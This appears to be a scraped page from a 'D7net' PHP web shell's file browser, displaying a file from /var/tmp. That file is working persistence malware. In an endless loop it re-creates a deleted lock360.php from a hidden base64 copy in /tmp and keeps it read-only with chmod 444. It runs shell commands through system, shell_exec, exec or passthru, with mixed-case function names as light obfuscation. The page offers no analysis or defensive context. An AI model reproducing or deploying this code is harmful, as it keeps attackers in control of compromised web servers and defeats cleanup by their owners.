D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
var
/
tmp
/
Filename :
68645a8fead7ec895a59ccf6dfa638b3lock360xhand.Lock
back
Copy
<?php $tmp = "/tmp"; $fileperm = d7net_perm("lock360.php"); d7net_cmd("chmod 444 lock360.php"); while (True) { if (!file_exists("lock360.php")) { $var = base64_encode(file_get_contents($tmp . "/f9227b858250b9ac6a7d8eee39e54b0elock360xd7net.Lock")); FiLe_pUt_ConTentS("lock360.php", base64_decode($var)); } if ($fileperm != "0444"){ d7net_cmd("chmod 444 lock360.php"); } } function d7net_cmd($value) { if (function_exists("system")) { sYsTem($value); } else if (function_exists("shell_exec")) { return ShEll_eXeC($value); } else if (function_exists("exec")) { return ExEc($value); } else if (function_exists("passthru")) { return pAsSThRu($value); } } function d7net_perm($filez){ return substr(sprintf("%o", fileperms($filez)), -4); }